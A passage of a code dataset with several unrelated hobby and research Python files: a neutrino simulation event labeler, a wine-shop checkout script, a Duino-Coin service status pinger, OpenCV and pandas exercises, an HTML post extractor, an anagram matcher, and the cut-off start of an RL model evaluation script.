1:\n            raise RuntimeError(\n                \"Set only one of event_properties_name, weight_dict_name and corsika_weight_map_name\"\n            )\n\n        self._is_li = self._event_properties_name is not None\n        if self._is_li and not LI_FOUND:\n            raise RuntimeError(\n                \"Simulation is LeptonInjector but couldn't import LeptonInjector.\"\n            )\n        self._is_corsika = self._corsika_weight_map_name is not None\n\n    def Geometry(self, frame):\n        if self._geo is None:\n            self._geo = frame[\"I3Geometry\"]\n        self.PushFrame(frame)\n\n    @staticmethod\n    def find_neutrinos(tree):\n        return tree.get_filter(\n            lambda p: (p.type in all_neutrinos) and np.isfinite(p.length)\n        )\n\n    @staticmethod\n    def get_inice_neutrino(tree, is_li):\n        #print(tree.get_primaries())\n        neutrino_primary = [p for p in tree.get_primaries() if p.type in all_neutrinos] #here is fix\n        #print(len(neutrino_primary))\n        if len(neutrino_primary) != 1:\n            return 1\n            
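# NOTE: returning the sentinel 1 here (instead of the original raise, kept commented out below) silently skips events without exactly one primary neutrino; callers compare the result against None rather than 1, so the sentinel is presumably tolerated downstream.\n            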
#raise RuntimeError(\"Found more or less than one primary neutrino\")\n        neutrino_primary = neutrino_primary[0]\n\n        if is_li:\n            # Assume that LI only inserts the final, in-ice neutrino\n            return neutrino_primary\n\n\n        # Not LI. Find highest energy in-ice neutrino\n        in_ice_nu = tree.get_best_filter(\n            lambda p: (p.location_type == I3Particle.InIce) and\n                      (p.type in all_neutrinos) and\n                      tree.is_in_subtree(neutrino_primary, p),\n            lambda p1, p2: p1.energy > p2.energy)\n\n\n        # if not in_ice_nu:\n        # For some reason, NuGen sometimes marks non-final neutrinos as in-ice.\n        # As a work-around find the highest energy in-ice particle in the\n        # subtree of the neutrino primary and work back from there\n        in_ice = tree.get_best_filter(\n            lambda p: (p.location_type == I3Particle.InIce)\n            and ((p.type in all_charged_leptons) or (p.type == I3Particle.Hadrons))\n            and tree.is_in_subtree(neutrino_primary, p),\n            lambda p1, p2: p1.energy > p2.energy,\n        )\n\n        def parent_nu(part, tree):\n            \"\"\"Recursively find the parent neutrino\"\"\"\n            if part.type in all_neutrinos:\n                return part\n            parent = tree.parent(part)\n            return parent_nu(parent, tree)\n\n        in_ice_nu = parent_nu(in_ice, tree)\n\n        # Sanity check\n\n        nu_children = tree.children(in_ice_nu)\n\n        subnu = [\n            p\n            for p in nu_children\n            if (p.type in all_neutrinos) and p.location_type == I3Particle.InIce\n        ]\n        if subnu and tree.children(subnu[0]):\n            print(\"Warning: found two in-ice neutrinos, trying child particle\")\n            return subnu[0]\n\n        return in_ice_nu\n\n    @staticmethod\n    def get_corsika_muons(tree):\n        primaries = [p for p in tree.get_primaries() if p.type not in all_neutrinos]\n        muons = [\n            p\n            for primary in primaries\n            for p in tree.children(primary)\n            if p.type in muon_types\n        ]\n\n        return muons\n\n    @staticmethod\n    def get_containment(\n        p, surface, decayed_before_type=containments_types.no_intersect\n    ):\n        \"\"\"\n        Determine containment type for particle `p`.\n        If `p` is a track, the `decayed_before_type` allows specifying the\n        containment type of particles that would intersect with the\n        surface, but decay before entering.\n        \"\"\"\n\n        intersections = surface.intersection(p.pos, p.dir)\n\n        if not np.isfinite(intersections.first):\n            return containments_types.no_intersect\n\n        if p.is_cascade:\n            if intersections.first <= 0 and intersections.second > 0:\n                return containments_types.contained\n            return containments_types.no_intersect\n\n        if p.is_track:\n            # Check if starting or contained\n            if intersections.first <= 0 and intersections.second > 0:\n                if p.length <= intersections.second:\n                    return containments_types.contained\n                return containments_types.starting\n\n            # Check if throughgoing or stopping\n            if intersections.first > 0 and intersections.second > 0:\n                if p.length <= intersections.first:\n                    return decayed_before_type\n                if p.length > intersections.second:\n                    return containments_types.throughgoing\n                else:\n                    return containments_types.stopping\n        return containments_types.no_intersect\n\n    @staticmethod\n    def get_neutrino_interaction_type_li(prop):\n        # Test for leptonic Glashow\n        if (\n            (prop.initialType == I3Particle.NuEBar)\n            and (prop.finalType1 in negative_charged_leptons)\n            and (prop.finalType2 in anti_neutrino_types)\n        ):\n            if prop.finalType1 == I3Particle.EMinus:\n                return interaction_types.gr_leptonic_e\n            if prop.finalType1 == I3Particle.MuMinus:\n                return interaction_types.gr_leptonic_mu\n            if prop.finalType1 == I3Particle.TauMinus:\n                return interaction_types.gr_leptonic_tau\n\n        # Test for hadronic Glashow\n        if (\n            (prop.initialType == I3Particle.NuEBar)\n            and 
(prop.finalType1 == I3Particle.Hadrons)\n and (prop.finalType2 == I3Particle.Hadrons)\n ):\n return interaction_types.gr_hadronic\n\n # Test for CC\n if prop.finalType1 in all_charged_leptons:\n if prop.initialType in electron_neutrinos:\n return interaction_types.nue_cc\n if prop.initialType in muon_neutrinos:\n return interaction_types.numu_cc\n if prop.initialType in tau_neutrinos:\n return interaction_types.nutau_cc\n\n # Test for NC\n if prop.finalType1 in all_neutrinos:\n if prop.initialType in electron_neutrinos:\n return interaction_types.nue_nc\n if prop.initialType in muon_neutrinos:\n return interaction_types.numu_nc\n if prop.initialType in tau_neutrinos:\n return interaction_types.nutau_nc\n\n raise RuntimeError(\n \"Unknown interaction type: {} -> {} + {}\".format(\n prop.initialType, prop.finalType1, prop.finalType2\n )\n )\n\n @staticmethod\n def get_neutrino_interaction_type_nugen(wdict, tree):\n int_t = wdict[\"InteractionType\"]\n nutype = wdict[\"InIceNeutrinoType\"]\n neutrino = MCLabeler.get_inice_neutrino(tree, is_li=False)\n\n if neutrino is None:\n return None\n\n children = tree.children(neutrino)\n if len(children) != 2:\n\n raise RuntimeError(\n \"Neutrino interaction with more or less than two children.\"\n )\n\n if int_t != 3:\n return nugen_int_t_mapping[(nutype, int_t)]\n\n if int_t == 3:\n # GR.\n if (children[0].type == I3Particle.Hadrons) and (\n children[1].type == I3Particle.Hadrons\n ):\n return interaction_types.gr_hadronic\n if (children[0].type in electron_types) or (\n children[1].type in electron_types\n ):\n return interaction_types.gr_leptonic_e\n if (children[0].type in muon_types) or (children[1].type in muon_types):\n return interaction_types.gr_leptonic_mu\n if (children[0].type in tau_types) or (children[1].type in tau_types):\n return interaction_types.gr_leptonic_tau\n raise RuntimeError(\n \"Unknown interaction type: {} -> {} + {} (Nugen type {})\".format(\n neutrino.type, children[0].type, children[1].type, int_t\n )\n )\n\n def _classify_neutrinos(self, frame):\n\n tree = frame[self._mctree_name]\n if self._is_li:\n prop = frame[self._event_properties_name]\n int_t = self.get_neutrino_interaction_type_li(prop)\n else:\n wdict = frame[self._weight_dict_name]\n int_t = self.get_neutrino_interaction_type_nugen(wdict, tree)\n\n in_ice_neutrino = self.get_inice_neutrino(tree, self._is_li)\n\n if in_ice_neutrino is not None:\n\n children = tree.children(in_ice_neutrino)\n # Classify everything related to muons\n if int_t in track_interactions:\n # figure out if vertex is contained\n muons = [p for p in children if p.type in muon_types]\n if len(muons) != 1:\n raise RuntimeError(\n \"Muon interaction with not exactly one muon child\"\n )\n\n containment = self.get_containment(muons[0], self._surface)\n\n # Classify everything related to cascades\n\n elif int_t in cascade_interactions:\n cascades = [p for p in children if p.is_cascade]\n if not cascades:\n raise RuntimeError(\n \"Found cascade-type interaction but no cascade children\"\n )\n # We can have more than one cascade, just check the first\n # TODO: Check whether there are any pitfalls with this approach\n\n containment = self.get_containment(cascades[0], self._surface)\n\n elif int_t in tau_interactions:\n taus = [p for p in children if p.type in tau_types]\n if len(taus) != 1:\n raise RuntimeError(\"Tau interaction with not exactly one tau child\")\n\n containment = self.get_containment(taus[0], self._surface)\n\n # if the tau is contained, check the tau decay\n if containment == 
containments_types.contained:\n                    tau_children = tree.children(taus[0])\n                    muons = [p for p in tau_children if p.type in muon_types]\n                    if len(muons) > 0:\n                        # the tau decays into a muon\n                        containment = containments_types.tau_to_mu\n\n                if containment == containments_types.no_intersect:\n                    # Check the containment of the resulting muon\n                    tau_muons = [\n                        p for p in tree.children(taus[0]) if p.type in muon_types\n                    ]\n                    if len(tau_muons) > 1:\n                        raise RuntimeError(\"Tau decay with more than one muon\")\n                    elif len(tau_muons) == 1:\n                        # We have a muon\n\n                        muon_containment = self.get_containment(\n                            tau_muons[0], self._surface\n                        )\n                        containment = muon_containment\n\n                        # Since the tau is uncontained, we label the event by the topology\n                        # of the muon created in the tau decay\n                        int_t = interaction_types.numu_cc\n\n            else:\n                raise RuntimeError(\"Unknown interaction type: {}\".format(int_t))\n        else:\n            int_t = None\n            containment = None\n        return int_t, containment\n\n    def _classify_corsika(self, frame):\n        \"\"\"\n        Classify CORSIKA events.\n        The code to distinguish bundles / single muons is not yet perfect. There might\n        be edge cases where a single muon accompanied by low-energy muons that stop far\n        away from the detector is classified as skimming.\n        \"\"\"\n\n        tree = frame[self._mctree_name]\n        corsika_muons = self.get_corsika_muons(tree)\n\n        containments = [\n            self.get_containment(\n                muon, self._surface, decayed_before_type=containments_types.decayed\n            )\n            for muon in corsika_muons\n        ]\n\n        int_t = interaction_types.corsika\n\n        # Check if we are dealing with a single muon.\n        # Number of muons that would have intersected but decayed before entering the detector\n        num_decayed = len(\n            [cont for cont in containments if cont == containments_types.decayed]\n        )\n\n        if num_decayed == len(containments) - 1:\n            # all decayed except one. 
containment type is given by the surviving muon\n            not_decayed = [\n                cont for cont in containments if cont != containments_types.decayed\n            ][0]\n            return int_t, not_decayed\n\n        # at least one muon is uncontained\n        if any([cont == containments_types.no_intersect for cont in containments]):\n            return int_t, containments_types.no_intersect\n\n        # All muons are stopping\n        if all([cont == containments_types.stopping for cont in containments]):\n            return int_t, containments_types.stopping_bundle\n\n        # Bundle is throughgoing\n        return int_t, containments_types.throughgoing_bundle\n\n    def classify(self, frame):\n        if self._mctree_name not in frame:\n            raise RuntimeError(\"I3MCTree not found\")\n\n        if self._surface is None:\n            self._surface = MuonGun.ExtrudedPolygon.from_I3Geometry(\n                self._geo, self._det_hull_padding\n            )\n            self._surface_cr = MuonGun.ExtrudedPolygon.from_I3Geometry(\n                self._geo, self._cr_muon_padding\n            )\n\n        if self._is_corsika:\n            int_t, containment = self._classify_corsika(frame)\n        else:\n            int_t, containment = self._classify_neutrinos(frame)\n\n        # Polyplopia\n        tree = frame[self._mctree_name]\n        bg_tree = frame[self._bg_mctree_name]\n        poly_muons = self.get_corsika_muons(bg_tree)\n        containments = [\n            self.get_containment(muon, self._surface_cr) for muon in poly_muons\n        ]\n\n        n_stop_through = sum(\n            [\n                1\n                for cont in containments\n                if cont\n                in [containments_types.stopping, containments_types.throughgoing]\n            ]\n        )\n\n        mcpe_from_muons = 0\n        mcpe_from_muons_charge = 0\n\n        # Sadly some simulations break the MCPEID map, so give users the chance to skip\n        if self._mcpe_pid_map_name is not None and self._mcpe_pid_map_name in frame:\n            # Also collect MCPE from CR muons\n            poly_muon_ids = [p.id for p in poly_muons]\n            # Most MCPE will be caused by daughter particles of the muon\n            poly_muon_ids += [ch.id for p in poly_muons for ch in tree.children(p)]\n\n            if self._mcpe_map_name in frame:\n                mcpe_series_map = frame[self._mcpe_map_name]\n                # Collect the total mcpe charge from CR muons\n                for omkey, idmap in frame[self._mcpe_pid_map_name]:\n\n                    if omkey not in mcpe_series_map:\n                        warnings.warn(\"Couldn't find OMKey in MCPESeriesMap\")\n                    else:\n                        mcpe_series = mcpe_series_map[omkey]\n                        for pmid in poly_muon_ids:\n                            # loop through the PIDs\n                            if pmid in idmap.keys():\n                                mcpe_indices = idmap[pmid]\n                                mcpe_from_muons_charge += sum(\n                                    [mcpe_series[i].npe for i in mcpe_indices]\n                                )\n\n                                mcpe_from_muons += len(mcpe_indices)\n\n        return (\n            class_mapping.get((int_t, containment), classification.unclassified),\n            n_stop_through,\n            mcpe_from_muons,\n            mcpe_from_muons_charge,\n        )\n\n    def DAQ(self, frame):\n        if self._geo is None:\n            raise RuntimeError(\"No geometry information found\")\n        classif, n_coinc, bg_mcpe, bg_mcpe_charge = self.classify(frame)\n        frame[\"classification\" + self._key_postfix] = icetray.I3Int(int(classif))\n        frame[\"classification_label\" + self._key_postfix] = dataclasses.I3String(\n            classif.name\n        )\n        frame[\"coincident_muons\" + self._key_postfix] = icetray.I3Int(n_coinc)\n        frame[\"bg_muon_mcpe\" + self._key_postfix] = icetray.I3Int(bg_mcpe)\n        frame[\"bg_muon_mcpe_charge\" + self._key_postfix] = dataclasses.I3Double(\n            bg_mcpe_charge\n        )\n        self.PushFrame(frame)\n","repo_name":"ewarrick/name_that_neutrino","sub_path":"mc_labeler.py","file_name":"mc_labeler.py","file_ext":"py","file_size_in_byte":21237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"21736771628","text":"# RM: 98943 Name: Gustavo Fernandes Gonzalez Magalhaes\n\n# cp1 code, to make a purchase\n# at a wine shop\n\nprint(\"Welcome to the site!!!\")\n\nnome = input(\"Full name: \")\nidade = int(input(\"Your age: \"))\nendereço_do_cliente = input(\"address: \")\nendereço_de_entrega = input(\"delivery address: \")\n\nif endereço_do_cliente != endereço_de_entrega:\n    z = int(input(\"The delivery address differs from the customer's address, if it is correct type 1: \"))\n    if z == 1:\n        print(\"OK!\")\n    else:\n        print(\"fix the address!!!\")\n\n# 2 block the purchase if it is being made by a minor\nif idade < 18:\n    print(\"The purchase can only be made by a customer of legal age\")\nif idade >= 18:\n\n    print(\"[wines: \\n] 1 for wine1(R$50) \\n 2 for wine2(R$70) \\n 3 for wine3(R$25) \\n 4 for wine4(R$80) \\n 5 for wine5(R$110)\")\n    carrinho = 0\n    vinho1 = 50\n    vinho2 = 70\n    vinho3 = 25\n    vinho4 = 80\n    vinho5 = 110\n    estoque = 350\n    x = 1\n\n    while x < estoque:\n        vinhos = int(input(\"type the number(s) of the wine(s) you want to buy and 0 to finish the purchase \\n\"))\n\n        if vinhos == 0:\n            break\n\n        else:\n            if vinhos == 1:\n                carrinho = carrinho + vinho1\n\n            elif vinhos == 2:\n                carrinho = carrinho + vinho2\n\n            elif vinhos == 3:\n                carrinho = carrinho + vinho3\n\n            elif vinhos == 4:\n                carrinho = carrinho + vinho4\n\n            elif vinhos == 5:\n                carrinho = carrinho + vinho5\n\n            x += 1\n\n            if vinhos > 5:\n                print(\"please type only one of the listed numbers\")\n\n    if carrinho <= 100:\n        print(\"the minimum amount for a purchase is R$100\")\n\n    elif carrinho >= 200:\n        print(\"Your shipping will not be charged\")\n\n    else:\n        carrinho = carrinho + 15\n        print(\"your shipping cost will be R$15\")\n\n    print(\"so that we can finish your purchase, please fill in the information below:\")\n\n    cpf = str(input(\"Your CPF: \"))\n    cep = str(input(\"the CEP of the delivery address: \"))\n\n    print(\"%d products were purchased\" % (x - 1))\n    print(\"the final amount of your purchase will be R$%d\" % carrinho)\n    print(\"your product(s) will be delivered at \" + endereço_de_entrega)\n\n    a = int(input(\"To finish the purchase type 1: \"))\n\n    if a == 1:\n        print(\"thank you for your purchase\")\n\n    else:\n        print(\"Purchase canceled\")\n","repo_name":"GustavoFGM/cp1.Python","sub_path":"cp1.py","file_name":"cp1.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"74786044888","text":"# This python code is used to ping all duco services and create a json file with online/offline services\nimport urllib.request\nimport json\nimport time\nimport socket\nfrom websocket import create_connection\nimport os\nhostnames = {\n    # websites\n    \"website\": \"https://duinocoin.com\",\n    \"api\": \"https://server.duinocoin.com/users/revox\",\n    \"masterweb\": \"https://server.duinocoin.com/\",\n}\npools = {\n    \"bilapool\": {\n        \"ip\": \"51.158.113.59\",\n        \"port\": 6042\n    },\n    \"beyondpool\": {\n        \"ip\": \"50.112.145.154\",\n        \"port\": 6002\n    },\n    \"svkopool\": {\n        \"ip\": \"5.230.69.132\",\n        \"port\": 6000\n    },\n    \"starpool\": {\n        \"ip\": \"51.158.182.90\",\n        \"port\": 6006\n    }\n}\nonline = {\n    \"website\": False,\n    \"api\": False,\n    \"bilapool\": False,\n    \"beyondpool\": False,\n    \"svkopool\": False,\n    \"starpool\": False,\n    \"masterweb\": False,\n}\n\nsince = {\n    \"website\": False,\n    \"api\": False,\n    \"bilapool\": False,\n    \"beyondpool\": False,\n    \"svkopool\": False,\n    \"starpool\": False,\n    
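# timestamp of the last observed status change for each service, filled in by the __main__ block below\n    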
\"masterweb\": False,\n}\n\ndef checkanode(nodeobj):\n maxretrys = 0\n node= False\n while node != True and maxretrys<2:\n try:\n print(\"Testing %s with try number:\" % nodeobj + str(maxretrys))\n maxretrys+=1\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n s.settimeout(10)\n s.connect((nodeobj[\"ip\"], nodeobj[\"port\"])) \n msg = s.recv(1024)\n if(msg.decode(\"utf-8\") != \"\"):\n s.close()\n print(\"Accessing successfull\")\n node = True\n return node\n except:\n print(\"error\")\n return False\ndef checkweb(hostname):\n maxretrys=0\n web = False\n while web != True and maxretrys<4: \n try:\n print(\"Testing %s with try number:\" % hostname + str(maxretrys))\n maxretrys+=1\n\n url = hostname\n req = urllib.request.Request(\n url, \n data=None, \n headers={\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'\n }\n )\n with urllib.request.urlopen(req) as url2:\n if(url2.getcode()==200):\n web=True\n print(\"Accessing successfull\")\n return web\n except:\n print(\"error\")\n return False\nif __name__ == \"__main__\":\n for elements in pools:\n if checkanode(pools[elements]):\n online[elements]=True\n for elements in hostnames:\n if checkweb(hostnames[elements]):\n online[elements]=True\n with open('ducostats.json', 'r') as f:\n data = json.load(f)\n for elements in data:\n if(elements != \"lastupdate\"):\n if data[elements][\"online\"] != online[elements]:\n since[elements]=time.time()\n else:\n since[elements]=data[elements][\"since\"]\n for x in online:\n data[x][\"online\"]=online[x]\n data[x][\"since\"]=since[x]\n data[\"lastupdate\"] = int(time.time())\n with open('ducostats.json', 'w', encoding='utf-8') as file:\n json.dump(data, file)\n\n ","repo_name":"Lulaschkas/duco-mining-dashboard","sub_path":"checkducoservices.py","file_name":"checkducoservices.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"31"} +{"seq_id":"32398691459","text":"import cv2\r\nimport numpy as np\r\n\r\n\r\ndef nothing(x):\r\n pass\r\n\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\ncv2.namedWindow(\"trackbars\")\r\ncv2.createTrackbar('th', 'trackbars', 50, 255, nothing) # borrão\r\ncv2.createTrackbar('erosao', 'trackbars', 1, 255, nothing) # erosão\r\ncv2.createTrackbar('dil', 'trackbars', 1, 255, nothing) # dilatação\r\ncv2.createTrackbar('opening', 'trackbars', 1, 255, nothing) # open\r\ncv2.createTrackbar('closing', 'trackbars', 1, 255, nothing) # close\r\n\r\nwhile True:\r\n ret, frame = cap.read()\r\n # cv2.imshow('frame', frame)\r\n\r\n # escala de cinza\r\n gray = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY)\r\n # cv2.imshow('gray', gray)\r\n # blur\r\n blur = cv2.GaussianBlur(gray, (5, 5), 0)\r\n\r\n # THRESHOLD ou borrado\r\n th = cv2.getTrackbarPos('th', 'trackbars')\r\n ret, thresh = cv2.threshold(blur, th, 255, cv2.THRESH_BINARY)\r\n cv2.imshow('thresh', thresh)\r\n\r\n # Erosão\r\n kernel = np.ones((2, 2), np.uint8)\r\n erosao = cv2.getTrackbarPos('erosao', 'trackbars')\r\n erosion = cv2.erode(thresh, kernel, iterations=erosao)\r\n cv2.imshow('erosion', erosion)\r\n\r\n # Dilatação\r\n dil = cv2.getTrackbarPos('dil', 'trackbars')\r\n dilata = cv2.dilate(thresh, kernel, iterations=dil)\r\n cv2.imshow('dilata', dilata)\r\n\r\n # open\r\n op = cv2.getTrackbarPos('opening', 'trackbars')\r\n opening = cv2.morphologyEx(thresh, cv2.MORPH_OPEN, kernel, iterations=op)\r\n cv2.imshow('opening', opening)\r\n\r\n # open\r\n cl = 
cv2.getTrackbarPos('closing', 'trackbars')\r\n closing = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, kernel, iterations=cl)\r\n cv2.imshow('closing', closing)\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('s'):\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"AlanGalvao/morfologia_imagens","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15608082850","text":"import pandas as pd\n\nclass DataCleanUp:\n df = pd.read_csv(\"/content/agro_clean_data.csv\")\n\n #Count how much a string in a cell appears in the whole file\n\n def CountAppearances():\n counter = 0\n for i in range(Rows):\n \n ######################################################################\n # Modify these parameters running code or it will generate an error! #\n ######################################################################\n \n if (df.at[i,'ColumnName'] == \"string to look for\"):\n counter = counter + 1\n\n if(counter > 1):\n print(\"The string has appeared \" + str(counter) + \" times in this spreadsheet\")\n elif(counter == 1):\n print(\"The string has appeared only once\")\n else:\n (\"Could not find the string\")\n\n\n #Change the character from a cell to a different char\n\n def FixCells(ColumnName, OldCharacter, NewCharacter):\n df[ColumnName] = df[ColumnName].str.replace(OldCharacter,NewCharacter)\n\n#Change a cell that contains dual data to a data that comes after a delimeter\n\n def CleanDualData(ColumnName, Delimiter):\n df[ColumnName] = df[ColumnName].str.split(Delimiter).str[0]\n \n #Add Data After delimiter to a second column\n \n def AddDualDataToColumn(ColumnName, Delimiter):\n df[ColumnName + \"_Second\"] = df[ColumnName].str.split(Delimiter).str[1]\n \n def EliminateBadData(ColumnName, CharNo):\n for i in range(497):\n if(len(df.at[i,ColumnName]) != CharNo):\n df.at[i,ColumnName] = \"\"\n \n def EliminateStringFromInt(ColumnName):\n df['columnName'] = df['columnName'].astype('str').str.extractall('(\\d+)').unstack().fillna('').sum(axis=1).astype(int)\n\n\nFixCells('Phone_Number','09', '9')\nFixCells('Phone_Number', '011', '11')\nCleanDualData('Phone_Number', '/')\n\nprint(df)\n\n\n\n\n\n","repo_name":"ahmedabdurahim/Data-Cleanup-Python","sub_path":"DataCleanUp.py","file_name":"DataCleanUp.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9937065198","text":"from bs4 import BeautifulSoup\nfrom bs4.element import Tag\nfrom tqdm import tqdm as tqdm\nfrom typing import List\nimport json\nimport glob\nimport re\n\nclass HTMLExtractor(object):\n\n def __init__(self, html_str: str) -> None:\n \n self.soup = BeautifulSoup(html_str, 'lxml')\n \n def select_by_class(self, html_element=\"div\", \n html_class=\"bbWrapper\"):\n return self.soup.find_all(html_element, {\"class\": html_class})\n\n def strip_tag_from_html_string(self, html_str: str, html_tag: str) -> str:\n '''\n Sample input:

    I\\'m in the same spot as you. LPN, needing to work from home

    \n Sample output:

    I\\'m in the same spot as you, needing to work from home

    \n '''\n regex = \"<{}(.|\\n)*?\".format(html_tag, html_tag)\n return re.sub(regex, \"\", str(html_str))\n\n def exclude_tags_by_class(self, tags: List[Tag], _class='ipsItemControls'):\n '''exclude tags with a given class from a list of bs4 tags'''\n return [o for o in tags if _class not in o.attrs[\"class\"]]\n\n def extract(self, html_element=\"div\", html_class=\"message-userContent\"):\n\n items = self.select_by_class(html_element, html_class)\n\n output = []\n \n for i, item in enumerate(items):\n tags = [c for c in item.children if type(c) == Tag]\n tags = self.exclude_tags_by_class(tags, _class='ipsItemControls')\n for c in tags:\n item = self.strip_tag_from_html_string(str(c), \"abbr\")\n item = BeautifulSoup(item, 'lxml')\n item = item.text\n item = item.replace(\"\\n\", \" \").strip()\n output.append(item)\n\n return output\n\n\nif __name__ == \"__main__\":\n with open(\"index.html\", \"r\") as inf:\n html_doc = inf.read()\n extractor = HTMLExtractor(html_doc)\n messages = extractor.extract(html_element=\"div\", html_class=\"cPost_contentWrap\")\n for i, message in enumerate(messages):\n print(i, message)\n","repo_name":"AbeHandler/scratch","sub_path":"proc.py","file_name":"proc.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22180575991","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 2 12:02:17 2020\n\n@author: grego\n\"\"\"\n\ndef convertSpecialChars(word):\n replace_strings = {'0' : 'null',\n '11': 'elf',\n '1' : 'eins',\n '2' : 'zwei',\n '3' : 'drei',\n '4' : 'vier',\n '5' : 'fuenf',\n '6' : 'sechs',\n '7' : 'sieben',\n '8' : 'acht',\n '9' : 'neun',\n 'ä' : 'ae',\n 'ö' : 'oe',\n 'ü' : 'ue',\n 'ß' : 'ss',\n ' ' : '',\n '\\n' : '',\n '\\t' : '',\n '_' : '',\n '.' 
: '',\n '-' : '',\n \"'\" : '',\n '+' : '',\n '&' : ''}\n \n word = word.lower()\n \n for k in replace_strings:\n word = word.replace(k, replace_strings[k])\n \n return word\n\n\nwith open('input_tomatch2.txt', 'r', encoding=\"utf-8\") as f:\n lines_tomatch = f.readlines()\n \nwith open('input_dict.txt', 'r', encoding=\"utf-8\") as f:\n lines_dict = f.readlines() \n \nlines_tomatch = [s.replace('\\n', '').replace('\\t', '') for s in lines_tomatch]\nlines_dict = [s.replace('\\n', '').replace('\\t', '') for s in lines_dict]\nlines_dict = list(set(lines_dict)) # remove duplicates \n\nlines_tomatch_mod = [convertSpecialChars(s) for s in lines_tomatch]\nlines_dict_mod = [convertSpecialChars(s) for s in lines_dict]\n\nfor idxToMatch, wordToMatch in enumerate(lines_tomatch_mod):\n matchFound = False\n \n for idxDict, wordDictMod in enumerate(lines_dict_mod):\n if sorted(wordToMatch) == sorted(wordDictMod):\n #if (all(x in wordToMatch for x in wordDictMod)):\n print(f'[MATCH] {lines_tomatch[idxToMatch]} -> {wordToMatch} -> {wordDictMod} -> {lines_dict[idxDict]}')\n matchFound = True\n break\n \n \n if not matchFound:\n print(f'[ERROR] {lines_tomatch[idxToMatch]} -> No match found')","repo_name":"noxthot/geocaching_mystery_snippets","sub_path":"anagram_matcher/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21488958077","text":"import cv2\r\nimport json\r\nimport click\r\nimport os\r\nimport importlib\r\nfrom tensorboard.backend.event_processing import event_accumulator\r\nimport torch\r\nimport numpy as np\r\nfrom unstable_baselines.common.env_wrapper import get_env\r\nfrom unstable_baselines.common.util import load_config, set_device_and_logger\r\nfrom tqdm import tqdm\r\nfrom operator import itemgetter\r\nfrom unstable_baselines.common import util\r\n\r\nAGENT_MODULE_MAPPING={\r\n \"sac\":\"unstable_baselines.baselines.sac.agent\",\r\n \"ddpg\":\"unstable_baselines.baselines.ddpg.agent\",\r\n \"dqn\":\"unstable_baselines.baselines.dqn.agent\",\r\n \"ppo\":\"unstable_baselines.baselines.ppo.agent\",\r\n \"redq\":\"unstable_baselines.baselines.redq.agent\",\r\n \"td3\":\"unstable_baselines.baselines.td3.agent\",\r\n \"vpg\":\"unstable_baselines.baselines.vpg.agent\",\r\n \"mbpo\":\"unstable_baselines.model_based_rl.mbpo.agent\",\r\n \"pearl\": \"unstable_baselines.meta_rl.pearl.agent\"\r\n}\r\n\r\ndef load_params(log_dir):\r\n config_path = os.path.join(log_dir, 'parameters.txt')\r\n with open(config_path, 'r') as f:\r\n params = json.load(f)\r\n return params\r\n \r\ndef rollout(agent, env, width, height, max_trajectory_length, ret_imgs, **args):\r\n\r\n imgs = []\r\n traj_ret = 0\r\n obs = env.reset()\r\n if ret_imgs:\r\n img = env.render(mode='rgb_array', width=width, height=height)\r\n imgs.append(img)\r\n for step in range(max_trajectory_length):\r\n #obs = torch.FloatTensor(obs).to(util.device)\r\n action = agent.select_action(obs)['action']\r\n next_obs, reward, done, _ = env.step(action)\r\n traj_ret += reward\r\n obs = next_obs\r\n if ret_imgs:\r\n img = env.render(mode='rgb_array', width=width, height=height)\r\n imgs.append(img)\r\n if done:\r\n break\r\n return {\r\n \"ret\": traj_ret,\r\n \"imgs\": imgs if ret_imgs else None\r\n }\r\n \r\n\r\ndef select_best_snapshot(agent, env, snapshot_dirs, config):\r\n best_snapshot_dir = \"\"\r\n best_ret = -np.inf\r\n for snapshot_dir in tqdm(snapshot_dirs):\r\n for network_name, net in 
agent.networks.items():\r\n load_path = os.path.join(snapshot_dir, network_name + \".pt\")\r\n agent.__dict__[network_name] = torch.load(load_path, map_location=util.device)\r\n rets = []\r\n for trial in range(config['num_trials']):\r\n traj_ret = rollout(agent, env, ret_imgs=False, **config)['ret']\r\n rets.append(traj_ret)\r\n ret_mean = np.mean(rets)\r\n if ret_mean > best_ret:\r\n best_snapshot_dir = snapshot_dir\r\n best_ret = ret_mean\r\n return best_ret, best_snapshot_dir\r\n\r\n\r\ndef load_snapshot(agent, env, log_dir, config):\r\n #get model path\r\n snapshot_dir = os.path.join(log_dir, \"models\")\r\n snapshot_dirs = [d for d in os.listdir(snapshot_dir) if \"ite_\" in d]\r\n snapshot_relative_dirs = [os.path.join(snapshot_dir, d) for d in snapshot_dirs]\r\n snapshot_timestamps = [int(d[4:]) for d in snapshot_dirs]\r\n snapshot_timestamps = sorted(snapshot_timestamps)\r\n if config['mode'] == 'last':\r\n selected_timestamp = snapshot_timestamps[-1]\r\n elif config['mode'] == 'best':\r\n best_ret, selected_dir = select_best_snapshot(agent, env, snapshot_relative_dirs, config)\r\n selected_timestamp = int(selected_dir.split(os.sep)[-1][4:])\r\n\r\n selected_snapshot_dir = os.path.join(snapshot_dir, \"ite_\"+str(selected_timestamp))\r\n for network_name, net in agent.networks.items():\r\n load_path = 